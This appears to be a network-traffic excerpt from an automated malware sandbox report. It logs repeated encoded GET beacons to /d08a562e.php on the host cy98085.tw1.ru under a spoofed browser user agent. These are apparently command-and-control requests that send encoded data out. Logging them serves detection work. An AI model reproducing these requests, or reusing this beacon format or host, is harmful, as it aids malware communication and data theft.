            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDNiVGNkBjYmJDO1MTZ3M2NwEGO0EmN1ICLiITN1gjZwcTYmdTM4UzN2MjZwQWZxIDNlFjNyIDOhNmYmRTYlBDO4EjI6IyN3ETYjZmZwI2YiVGMjFWMjZGOxUjZwMTOlhTM3YGOjJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM&b7b99a30519e3c2e292a564e824776d3=5b034698153668d1ec1ed7aaf90dfff6&e14aa04c57d43a589b010571fdc09bbd=wNmhzMkV2NkNWOjZDM2YTMjZWYjRGZyETM0YDOwQjMmlzMwATYyIGM&BUISt3=gMc0F&6MLl4TR7bW=lK7at6jiv9hnPMHdbskIx3H&JkwIAjLj8Zrj5q=Q2STSZi6ZxzzP0N4rChRJJbhM HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&1897097195362e5524f24dd6cd4188d9=0VfiIiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNTWCpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&53aa3a9fb57d34776a6131d2274538b1=QX9JSUmlWTYpFc41WW0ZlMjpnRFl0d502YsJlbipkQTVWeGdlYwpESVNGeGRGb10GTwolMipXOtNmasdlYjhnVLJzZEV2bBl3Ysh3VhdkQTJGaKNjW2pESVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIlFGOzYWZhdjM4kzMmVmNlJGN5MzMhZ2MxEjZ5EGN5U2YjRmY0M2NxIiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ruConnection: Keep-Alive
